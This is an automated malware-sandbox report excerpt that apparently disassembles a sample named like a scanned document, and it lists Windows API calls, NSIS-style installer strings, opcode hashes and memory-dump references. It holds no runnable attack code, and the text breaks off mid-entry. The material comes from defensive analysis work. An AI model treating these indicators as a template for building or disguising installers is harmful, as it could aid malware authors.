                                                      • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                      • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                      • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                      • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                      • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                      • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                      • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                      • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      • GlobalFree.KERNEL32(0073AFD0), ref: 00402387
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 3376005127-0
                                                      • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                      • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                      • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                      • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                      • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                      • String ID:
                                                      • API String ID: 2568930968-0
                                                      • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                      • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                      • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                      • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                      APIs
                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                      • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                      • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                      • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                      • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                      • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                      • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                      APIs
                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                      • API String ID: 1697273262-1764544995
                                                      • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                      • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                      • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                      • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00404902
                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID: $@rD
                                                      • API String ID: 3748168415-881980237
                                                      • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                      • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                      • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                      • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                        • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                      • String ID: CopyFiles "%s"->"%s"
                                                      • API String ID: 2577523808-3778932970
                                                      • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                      • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                      • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                      • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: lstrcatwsprintf
                                                      • String ID: %02x%c$...
                                                      • API String ID: 3065427908-1057055748
                                                      • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                      • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                      • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                      • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 00405057
                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                      • API String ID: 2266616436-4211696005
                                                      • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                      • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                      • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                      • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00402100
                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                      • String ID:
                                                      • API String ID: 1599320355-0
                                                      • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                      • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                      • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                      • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                      APIs
                                                        • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                      • String ID: Version
                                                      • API String ID: 512980652-315105994
                                                      • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                      • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                      • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                      • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                      • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                      • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                      • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                      • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                      • String ID:
                                                      • API String ID: 2883127279-0
                                                      • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
